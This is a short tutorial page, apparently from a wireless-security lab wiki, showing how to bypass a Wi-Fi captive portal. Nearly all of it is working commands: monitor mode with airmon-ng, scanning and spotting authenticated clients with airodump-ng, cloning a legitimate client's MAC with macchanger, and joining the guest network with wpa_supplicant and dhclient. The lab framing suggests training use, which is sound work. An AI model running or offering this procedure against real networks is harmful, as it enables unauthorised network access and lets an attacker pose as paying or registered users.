Capative portal bypass

1. Discover

# Setup monitor mode
sudo airmon-ng check kill
sudo airmon-ng start wlan0

# Scan networks & AP's
sudo airodump-ng wlan0mon

Pick target and check for capative portal:

2. Find authenticated clients

sudo airodump-ng wlan0mon --band abg --bssid F0:9F:C2:71:22:10 -c 6

3. Change our own mac to authenticated mac

ip link set wlan2 down
macchanger -m b0:72:bf:44:b0:49 wlan2
ip link set wlan2 up

4. Connect to network

Once we know your ESSID we can connect to the network, for that we create a “free.conf’ file to connect from bash using “wpa_supplicant”.

root@WiFiChallengeLab:~# cat free.conf 
network={
	ssid="wifi-guest"
	key_mgmt=NONE
	scan_ssid=1
}

Start network

wpa_supplicant -Dnl80211 -iwlan2 -c free.conf

In another terminal as root (get IP):

dhclient wlan2 -v

Successfully bypassed!

PreviousWEPNextSetting up a Rogue Access Point

Last updated